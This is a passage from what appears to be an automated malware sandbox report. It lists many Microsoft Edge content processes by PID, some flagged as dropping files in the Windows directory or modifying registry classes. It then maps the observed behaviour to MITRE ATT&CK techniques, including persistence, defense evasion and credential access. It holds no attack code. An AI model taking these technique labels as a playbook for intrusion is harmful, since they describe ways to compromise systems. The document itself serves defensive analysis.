C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6344

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:2240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:5384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:1340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:7056

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery